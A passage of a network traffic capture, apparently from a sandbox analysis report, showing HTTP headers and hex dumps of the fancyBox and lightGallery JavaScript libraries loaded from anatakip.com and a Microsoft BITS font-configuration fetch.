                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:34 UTC840INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Content-Length: 23090
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=23180
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 14:28:16 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 289758
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYByd0YnjUDCOnoJrGSjLCbDf%2B93tEQjPEZUvHdZugS9KxwURYbKGSnUprIxXQZal02m2tkroxHnxe%2Bqn2hhbSC2uu92dj%2FYseN%2BeoEma2lIGdgOXSugHcTuN%2BP73Ms%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d6e49c77d16-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:34 UTC529INData Raw: 2f 2a 21 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 72 2c 47 2c 66 2c 76 29 7b 76 61 72 20 4a 3d 66 28 22 68 74 6d 6c 22 29 2c 6e 3d 66 28 72 29 2c 70 3d 66 28 47 29 2c 62 3d 66 2e 66 61 6e 63 79 62 6f 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 6f 70 65 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 49 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 6d 73 69 65 2f 69 29 2c 42 3d 6e 75 6c 6c 2c 73 3d 47 2e 63 72 65 61 74 65 54 6f 75 63 68 21 3d 3d 76 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e
                    Data Ascii: /*!fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license*/(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){return
                    2024-05-26 22:57:34 UTC1369INData Raw: 7b 76 65 72 73 69 6f 6e 3a 22 32 2e 31 2e 35 22 2c 64 65 66 61 75 6c 74 73 3a 7b 70 61 64 64 69 6e 67 3a 31 35 2c 6d 61 72 67 69 6e 3a 32 30 2c 77 69 64 74 68 3a 38 30 30 2c 68 65 69 67 68 74 3a 36 30 30 2c 6d 69 6e 57 69 64 74 68 3a 31 30 30 2c 6d 69 6e 48 65 69 67 68 74 3a 31 30 30 2c 6d 61 78 57 69 64 74 68 3a 39 39 39 39 2c 6d 61 78 48 65 69 67 68 74 3a 39 39 39 39 2c 70 69 78 65 6c 52 61 74 69 6f 3a 31 2c 61 75 74 6f 53 69 7a 65 3a 21 30 2c 61 75 74 6f 48 65 69 67 68 74 3a 21 31 2c 61 75 74 6f 57 69 64 74 68 3a 21 31 2c 61 75 74 6f 52 65 73 69 7a 65 3a 21 30 2c 61 75 74 6f 43 65 6e 74 65 72 3a 21 73 2c 66 69 74 54 6f 56 69 65 77 3a 21 30 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 21 31 2c 74 6f 70 52 61 74 69 6f 3a 30 2e 35 2c 6c 65 66 74 52 61 74 69 6f
                    Data Ascii: {version:"2.1.5",defaults:{padding:15,margin:20,width:800,height:600,minWidth:100,minHeight:100,maxWidth:9999,maxHeight:9999,pixelRatio:1,autoSize:!0,autoHeight:!1,autoWidth:!1,autoResize:!0,autoCenter:!s,fitToView:!0,aspectRatio:!1,topRatio:0.5,leftRatio
                    2024-05-26 22:57:34 UTC1369INData Raw: 73 65 42 74 6e 3a 27 3c 61 20 74 69 74 6c 65 3d 22 43 6c 6f 73 65 22 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 69 74 65 6d 20 66 61 6e 63 79 62 6f 78 2d 63 6c 6f 73 65 22 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 3b 22 3e 3c 2f 61 3e 27 2c 6e 65 78 74 3a 27 3c 61 20 74 69 74 6c 65 3d 22 4e 65 78 74 22 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 6e 61 76 20 66 61 6e 63 79 62 6f 78 2d 6e 65 78 74 22 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 3b 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 27 2c 70 72 65 76 3a 27 3c 61 20 74 69 74 6c 65 3d 22 50 72 65 76 69 6f 75 73 22 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 6e 61 76 20 66 61 6e 63 79 62 6f 78 2d 70 72 65 76 22 20 68 72 65 66 3d 22 6a 61 76 61 73
                    Data Ascii: seBtn:'<a title="Close" class="fancybox-item fancybox-close" href="javascript:;"></a>',next:'<a title="Next" class="fancybox-nav fancybox-next" href="javascript:;"><span></span></a>',prev:'<a title="Previous" class="fancybox-nav fancybox-prev" href="javas
                    2024-05-26 22:57:34 UTC1369INData Raw: 28 29 29 29 3a 6b 3d 63 29 3b 67 3d 64 2e 68 72 65 66 7c 7c 6b 2e 68 72 65 66 7c 7c 28 71 28 63 29 3f 63 3a 6e 75 6c 6c 29 3b 68 3d 64 2e 74 69 74 6c 65 21 3d 3d 76 3f 64 2e 74 69 74 6c 65 3a 6b 2e 74 69 74 6c 65 7c 7c 22 22 3b 6d 3d 28 6a 3d 64 2e 63 6f 6e 74 65 6e 74 7c 7c 6b 2e 63 6f 6e 74 65 6e 74 29 3f 22 68 74 6d 6c 22 3a 64 2e 74 79 70 65 7c 7c 6b 2e 74 79 70 65 3b 21 6d 26 26 6b 2e 69 73 44 6f 6d 26 26 28 6d 3d 63 2e 64 61 74 61 28 22 66 61 6e 63 79 62 6f 78 2d 74 79 70 65 22 29 2c 6d 7c 7c 28 6d 3d 28 6d 3d 63 2e 70 72 6f 70 28 22 63 6c 61 73 73 22 29 2e 6d 61 74 63 68 28 2f 66 61 6e 63 79 62 6f 78 5c 2e 28 5c 77 2b 29 2f 29 29 3f 6d 5b 31 5d 3a 6e 75 6c 6c 29 29 3b 71 28 67 29 26 26 28 6d 7c 7c 28 62 2e 69 73 49 6d 61 67 65 28 67 29 3f 6d 3d 22
                    Data Ascii: ())):k=c);g=d.href||k.href||(q(c)?c:null);h=d.title!==v?d.title:k.title||"";m=(j=d.content||k.content)?"html":d.type||k.type;!m&&k.isDom&&(m=c.data("fancybox-type"),m||(m=(m=c.prop("class").match(/fancybox\.(\w+)/))?m[1]:null));q(g)&&(m||(b.isImage(g)?m="
                    2024-05-26 22:57:34 UTC1369INData Raw: 68 6f 64 5d 28 29 29 29 29 7d 2c 70 6c 61 79 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 62 2e 70 6c 61 79 65 72 2e 74 69 6d 65 72 29 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 29 3b 62 2e 63 75 72 72 65 6e 74 26 26 62 2e 70 6c 61 79 65 72 2e 69 73 41 63 74 69 76 65 26 26 28 62 2e 70 6c 61 79 65 72 2e 74 69 6d 65 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 62 2e 6e 65 78 74 2c 62 2e 63 75 72 72 65 6e 74 2e 70 6c 61 79 53 70 65 65 64 29 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 29 3b 70 2e 75 6e 62 69 6e 64 28 22 2e 70 6c 61 79 65 72 22 29 3b 62 2e 70 6c 61 79 65 72 2e 69 73 41 63 74 69 76 65 3d 21 31 3b 62 2e 74 72 69 67 67 65 72 28 22 6f 6e 50 6c 61 79 45
                    Data Ascii: hod]())))},play:function(a){var d=function(){clearTimeout(b.player.timer)},e=function(){d();b.current&&b.player.isActive&&(b.player.timer=setTimeout(b.next,b.current.playSpeed))},c=function(){d();p.unbind(".player");b.player.isActive=!1;b.trigger("onPlayE
                    2024-05-26 22:57:34 UTC1369INData Raw: 75 74 6f 52 65 73 69 7a 65 29 26 26 62 2e 5f 73 65 74 44 69 6d 65 6e 73 69 6f 6e 28 29 2c 22 73 63 72 6f 6c 6c 22 3d 3d 3d 64 26 26 63 2e 63 61 6e 53 68 72 69 6e 6b 7c 7c 62 2e 72 65 70 6f 73 69 74 69 6f 6e 28 61 29 2c 62 2e 74 72 69 67 67 65 72 28 22 6f 6e 55 70 64 61 74 65 22 29 2c 42 3d 6e 75 6c 6c 29 7d 2c 65 26 26 21 73 3f 30 3a 33 30 30 29 29 7d 2c 74 6f 67 67 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 2e 69 73 4f 70 65 6e 26 26 28 62 2e 63 75 72 72 65 6e 74 2e 66 69 74 54 6f 56 69 65 77 3d 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 66 2e 74 79 70 65 28 61 29 3f 61 3a 21 62 2e 63 75 72 72 65 6e 74 2e 66 69 74 54 6f 56 69 65 77 2c 73 26 26 28 62 2e 77 72 61 70 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74 79 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22
                    Data Ascii: utoResize)&&b._setDimension(),"scroll"===d&&c.canShrink||b.reposition(a),b.trigger("onUpdate"),B=null)},e&&!s?0:300))},toggle:function(a){b.isOpen&&(b.current.fitToView="boolean"===f.type(a)?a:!b.current.fitToView,s&&(b.wrap.removeAttr("style").addClass("
                    2024-05-26 22:57:34 UTC1369INData Raw: 61 4b 65 79 26 26 28 21 6b 7c 7c 21 6b 2e 74 79 70 65 26 26 21 66 28 6b 29 2e 69 73 28 22 5b 63 6f 6e 74 65 6e 74 65 64 69 74 61 62 6c 65 5d 22 29 29 29 26 26 66 2e 65 61 63 68 28 64 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 6b 29 7b 69 66 28 31 3c 61 2e 67 72 6f 75 70 2e 6c 65 6e 67 74 68 26 26 6b 5b 63 5d 21 3d 3d 76 29 72 65 74 75 72 6e 20 62 5b 64 5d 28 6b 5b 63 5d 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 21 31 3b 69 66 28 2d 31 3c 66 2e 69 6e 41 72 72 61 79 28 63 2c 6b 29 29 72 65 74 75 72 6e 20 62 5b 64 5d 28 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 21 31 7d 29 7d 29 2c 66 2e 66 6e 2e 6d 6f 75 73 65 77 68 65 65 6c 26 26 61 2e 6d 6f 75 73 65 57 68 65 65 6c 26 26 62 2e 77 72 61 70 2e 62 69 6e 64 28 22 6d 6f 75 73
                    Data Ascii: aKey&&(!k||!k.type&&!f(k).is("[contenteditable]")))&&f.each(d,function(d,k){if(1<a.group.length&&k[c]!==v)return b[d](k[c]),e.preventDefault(),!1;if(-1<f.inArray(c,k))return b[d](),e.preventDefault(),!1})}),f.fn.mousewheel&&a.mouseWheel&&b.wrap.bind("mous
                    2024-05-26 22:57:34 UTC1369INData Raw: 28 64 2e 6d 61 72 67 69 6e 3d 5b 65 2c 65 2c 65 2c 65 5d 29 3b 22 6e 75 6d 62 65 72 22 3d 3d 3d 66 2e 74 79 70 65 28 63 29 26 26 28 64 2e 70 61 64 64 69 6e 67 3d 5b 63 2c 63 2c 63 2c 63 5d 29 3b 64 2e 6d 6f 64 61 6c 26 26 66 2e 65 78 74 65 6e 64 28 21 30 2c 64 2c 7b 63 6c 6f 73 65 42 74 6e 3a 21 31 2c 63 6c 6f 73 65 43 6c 69 63 6b 3a 21 31 2c 6e 65 78 74 43 6c 69 63 6b 3a 21 31 2c 61 72 72 6f 77 73 3a 21 31 2c 6d 6f 75 73 65 57 68 65 65 6c 3a 21 31 2c 6b 65 79 73 3a 6e 75 6c 6c 2c 68 65 6c 70 65 72 73 3a 7b 6f 76 65 72 6c 61 79 3a 7b 63 6c 6f 73 65 43 6c 69 63 6b 3a 21 31 7d 7d 7d 29 3b 64 2e 61 75 74 6f 53 69 7a 65 26 26 28 64 2e 61 75 74 6f 57 69 64 74 68 3d 64 2e 61 75 74 6f 48 65 69 67 68 74 3d 21 30 29 3b 22 61 75 74 6f 22 3d 3d 3d 64 2e 77 69 64 74
                    Data Ascii: (d.margin=[e,e,e,e]);"number"===f.type(c)&&(d.padding=[c,c,c,c]);d.modal&&f.extend(!0,d,{closeBtn:!1,closeClick:!1,nextClick:!1,arrows:!1,mouseWheel:!1,keys:null,helpers:{overlay:{closeClick:!1}}});d.autoSize&&(d.autoWidth=d.autoHeight=!0);"auto"===d.widt
                    2024-05-26 22:57:34 UTC1369INData Raw: 69 64 74 68 3a 30 2c 6d 69 6e 48 65 69 67 68 74 3a 30 2c 73 63 72 6f 6c 6c 69 6e 67 3a 22 6e 6f 22 2c 68 61 73 45 72 72 6f 72 3a 61 2c 63 6f 6e 74 65 6e 74 3a 62 2e 63 6f 6d 69 6e 67 2e 74 70 6c 2e 65 72 72 6f 72 7d 29 3b 62 2e 5f 61 66 74 65 72 4c 6f 61 64 28 29 7d 2c 5f 6c 6f 61 64 49 6d 61 67 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 62 2e 69 6d 67 50 72 65 6c 6f 61 64 3d 6e 65 77 20 49 6d 61 67 65 3b 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 74 68 69 73 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 3b 62 2e 63 6f 6d 69 6e 67 2e 77 69 64 74 68 3d 74 68 69 73 2e 77 69 64 74 68 2f 62 2e 6f 70 74 73 2e 70 69 78 65 6c 52 61 74 69 6f 3b 62 2e 63 6f 6d 69 6e 67 2e 68 65 69 67 68 74 3d 74 68 69 73
                    Data Ascii: idth:0,minHeight:0,scrolling:"no",hasError:a,content:b.coming.tpl.error});b._afterLoad()},_loadImage:function(){var a=b.imgPreload=new Image;a.onload=function(){this.onload=this.onerror=null;b.coming.width=this.width/b.opts.pixelRatio;b.coming.height=this
                    2024-05-26 22:57:34 UTC1369INData Raw: 28 64 2e 69 6e 64 65 78 2b 67 29 25 65 5d 2c 22 69 6d 61 67 65 22 3d 3d 3d 66 2e 74 79 70 65 26 26 66 2e 68 72 65 66 26 26 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 66 2e 68 72 65 66 29 7d 2c 5f 61 66 74 65 72 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 62 2e 63 6f 6d 69 6e 67 2c 64 3d 62 2e 63 75 72 72 65 6e 74 2c 65 2c 63 2c 6b 2c 67 2c 68 3b 62 2e 68 69 64 65 4c 6f 61 64 69 6e 67 28 29 3b 69 66 28 61 26 26 21 31 21 3d 3d 62 2e 69 73 41 63 74 69 76 65 29 69 66 28 21 31 3d 3d 3d 62 2e 74 72 69 67 67 65 72 28 22 61 66 74 65 72 4c 6f 61 64 22 2c 61 2c 64 29 29 61 2e 77 72 61 70 2e 73 74 6f 70 28 21 30 29 2e 74 72 69 67 67 65 72 28 22 6f 6e 52 65 73 65 74 22 29 2e 72 65 6d 6f 76 65 28 29 2c 62 2e 63 6f 6d 69 6e 67 3d 6e 75 6c
                    Data Ascii: (d.index+g)%e],"image"===f.type&&f.href&&((new Image).src=f.href)},_afterLoad:function(){var a=b.coming,d=b.current,e,c,k,g,h;b.hideLoading();if(a&&!1!==b.isActive)if(!1===b.trigger("afterLoad",a,d))a.wrap.stop(!0).trigger("onReset").remove(),b.coming=nul


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.549729184.28.90.27443
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    Accept-Encoding: identity
                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                    Range: bytes=0-2147483646
                    User-Agent: Microsoft BITS/7.8
                    Host: fs.microsoft.com
                    2024-05-26 22:57:35 UTC515INHTTP/1.1 200 OK
                    ApiVersion: Distribute 1.1
                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                    Content-Type: application/octet-stream
                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                    Server: ECAcc (lpl/EF06)
                    X-CID: 11
                    X-Ms-ApiVersion: Distribute 1.2
                    X-Ms-Region: prod-weu-z1
                    Cache-Control: public, max-age=234782
                    Date: Sun, 26 May 2024 22:57:35 GMT
                    Content-Length: 55
                    Connection: close
                    X-CID: 2
                    2024-05-26 22:57:35 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.549730104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC631OUTGET /assets/lightgallery/dist/js/lightgallery.min.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC773INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Sun, 02 Jun 2024 04:26:53 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 66641
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obmc55vK6DvLZrACVnsOzB4x%2BUtBR4JdIxDICFAxAm07%2Byez5vbsnwWnyXiegnjejJuzpWn6CmCn1rf%2Fu0XgPW9guIEWcEB86LDh4fi76joG7qFhvjZzwuqWAxdk%2BTA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d717a4642dc-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC596INData Raw: 34 34 61 36 0d 0a 2f 2a 21 20 6c 69 67 68 74 67 61 6c 6c 65 72 79 20 2d 20 76 31 2e 32 2e 32 31 20 2d 20 32 30 31 36 2d 30 36 2d 32 38 0d 0a 2a 20 68 74 74 70 3a 2f 2f 73 61 63 68 69 6e 63 68 6f 6f 6c 75 72 2e 67 69 74 68 75 62 2e 69 6f 2f 6c 69 67 68 74 47 61 6c 6c 65 72 79 2f 0d 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 53 61 63 68 69 6e 20 4e 3b 20 4c 69 63 65 6e 73 65 64 20 41 70 61 63 68 65 20 32 2e 30 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 62 2c 64 29 7b 69 66 28 74 68 69 73 2e 65 6c 3d 62 2c 74 68 69 73 2e 24 65 6c 3d 61 28 62 29 2c 74 68 69 73 2e 73 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 66 2c 64 29 2c 74 68 69 73 2e 73
                    Data Ascii: 44a6/*! lightgallery - v1.2.21 - 2016-06-28* http://sachinchoolur.github.io/lightGallery/* Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */!function(a,b,c,d){"use strict";function e(b,d){if(this.el=b,this.$el=a(b),this.s=a.extend({},f,d),this.s
                    2024-05-26 22:57:35 UTC1369INData Raw: 73 2e 68 69 64 65 43 6f 6e 74 72 6f 6c 4f 6e 45 6e 64 3d 21 31 29 2c 74 68 69 73 2e 73 2e 64 79 6e 61 6d 69 63 3f 74 68 69 73 2e 24 69 74 65 6d 73 3d 74 68 69 73 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 3a 22 74 68 69 73 22 3d 3d 3d 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 6f 72 3f 74 68 69 73 2e 24 69 74 65 6d 73 3d 74 68 69 73 2e 24 65 6c 3a 22 22 21 3d 3d 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 6f 72 3f 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 57 69 74 68 69 6e 3f 74 68 69 73 2e 24 69 74 65 6d 73 3d 61 28 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 57 69 74 68 69 6e 29 2e 66 69 6e 64 28 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 6f 72 29 3a 74 68 69 73 2e 24 69 74 65 6d 73 3d 74 68 69 73 2e 24 65 6c 2e 66 69 6e 64 28 61 28 74 68 69 73 2e 73 2e 73 65 6c 65 63 74 6f 72 29
                    Data Ascii: s.hideControlOnEnd=!1),this.s.dynamic?this.$items=this.s.dynamicEl:"this"===this.s.selector?this.$items=this.$el:""!==this.s.selector?this.s.selectWithin?this.$items=a(this.s.selectWithin).find(this.s.selector):this.$items=this.$el.find(a(this.s.selector)
                    2024-05-26 22:57:35 UTC1369INData Raw: 22 29 2e 68 61 73 43 6c 61 73 73 28 22 6c 67 2d 6f 6e 22 29 7c 7c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 62 75 69 6c 64 28 63 2e 69 6e 64 65 78 29 2c 61 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 6c 67 2d 6f 6e 22 29 7d 29 29 3a 63 2e 24 69 74 65 6d 73 2e 6f 6e 28 22 63 6c 69 63 6b 2e 6c 67 63 75 73 74 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 74 72 79 7b 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 63 61 74 63 68 28 64 29 7b 62 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 7d 63 2e 24 65 6c 2e 74 72 69 67 67 65 72 28 22 6f 6e 42 65 66 6f 72 65 4f 70 65 6e 2e 6c 67 22 29 2c 63 2e 69 6e 64 65 78 3d 63 2e 73 2e 69 6e 64 65 78 7c 7c 63 2e
                    Data Ascii: ").hasClass("lg-on")||setTimeout(function(){c.build(c.index),a("body").addClass("lg-on")})):c.$items.on("click.lgcustom",function(b){try{b.preventDefault(),b.preventDefault()}catch(d){b.returnValue=!1}c.$el.trigger("onBeforeOpen.lg"),c.index=c.s.index||c.
                    2024-05-26 22:57:35 UTC1369INData Raw: 27 2b 74 68 69 73 2e 73 2e 6e 65 78 74 48 74 6d 6c 2b 22 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 22 29 2c 22 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 22 3d 3d 3d 74 68 69 73 2e 73 2e 61 70 70 65 6e 64 53 75 62 48 74 6d 6c 54 6f 26 26 28 67 3d 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 67 2d 73 75 62 2d 68 74 6d 6c 22 3e 3c 2f 64 69 76 3e 27 29 2c 63 3d 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 67 2d 6f 75 74 65 72 20 27 2b 74 68 69 73 2e 73 2e 61 64 64 43 6c 61 73 73 2b 22 20 22 2b 74 68 69 73 2e 73 2e 73 74 61 72 74 43 6c 61 73 73 2b 27 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 67 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 27 2b 74 68 69 73 2e 73 2e 77 69 64 74 68 2b 22 3b 20 68 65 69 67 68 74 3a 22 2b 74 68 69 73 2e 73 2e 68 65 69 67 68 74 2b 27 22 3e 3c 64
                    Data Ascii: '+this.s.nextHtml+"</div></div>"),".lg-sub-html"===this.s.appendSubHtmlTo&&(g='<div class="lg-sub-html"></div>'),c='<div class="lg-outer '+this.s.addClass+" "+this.s.startClass+'"><div class="lg" style="width:'+this.s.width+"; height:"+this.s.height+'"><d
                    2024-05-26 22:57:35 UTC1369INData Raw: 73 3d 22 6c 67 2d 64 6f 77 6e 6c 6f 61 64 20 6c 67 2d 69 63 6f 6e 22 3e 3c 2f 61 3e 27 29 2c 74 68 69 73 2e 70 72 65 76 53 63 72 6f 6c 6c 54 6f 70 3d 61 28 62 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 54 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 31 30 30 25 22 21 3d 3d 74 68 69 73 2e 73 2e 68 65 69 67 68 74 29 7b 76 61 72 20 63 3d 61 28 62 29 2e 68 65 69 67 68 74 28 29 2c 64 3d 28 63 2d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 2e 68 65 69 67 68 74 2c 31 30 29 29 2f 32 2c 65 3d 74 68 69 73 2e 24 6f 75 74 65 72 2e 66 69 6e 64 28 22 2e 6c 67 22 29 3b 63 3e 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 2e 68 65 69 67 68 74 2c 31 30 29 3f 65 2e 63 73 73 28 22 74 6f 70 22 2c 64 2b 22 70 78 22 29
                    Data Ascii: s="lg-download lg-icon"></a>'),this.prevScrollTop=a(b).scrollTop()},e.prototype.setTop=function(){if("100%"!==this.s.height){var c=a(b).height(),d=(c-parseInt(this.s.height,10))/2,e=this.$outer.find(".lg");c>=parseInt(this.s.height,10)?e.css("top",d+"px")
                    2024-05-26 22:57:35 UTC1369INData Raw: 55 72 6c 3a 65 3d 74 68 69 73 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 62 5d 2e 73 75 62 48 74 6d 6c 3a 28 64 3d 74 68 69 73 2e 24 69 74 65 6d 73 2e 65 71 28 62 29 2c 64 2e 61 74 74 72 28 22 64 61 74 61 2d 73 75 62 2d 68 74 6d 6c 2d 75 72 6c 22 29 3f 63 3d 64 2e 61 74 74 72 28 22 64 61 74 61 2d 73 75 62 2d 68 74 6d 6c 2d 75 72 6c 22 29 3a 28 65 3d 64 2e 61 74 74 72 28 22 64 61 74 61 2d 73 75 62 2d 68 74 6d 6c 22 29 2c 74 68 69 73 2e 73 2e 67 65 74 43 61 70 74 69 6f 6e 46 72 6f 6d 54 69 74 6c 65 4f 72 41 6c 74 26 26 21 65 26 26 28 65 3d 64 2e 61 74 74 72 28 22 74 69 74 6c 65 22 29 7c 7c 64 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 66 69 72 73 74 28 29 2e 61 74 74 72 28 22 61 6c 74 22 29 29 29 29 2c 21 63 29 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79
                    Data Ascii: Url:e=this.s.dynamicEl[b].subHtml:(d=this.$items.eq(b),d.attr("data-sub-html-url")?c=d.attr("data-sub-html-url"):(e=d.attr("data-sub-html"),this.s.getCaptionFromTitleOrAlt&&!e&&(e=d.attr("title")||d.find("img").first().attr("alt")))),!c)if("undefined"!=ty
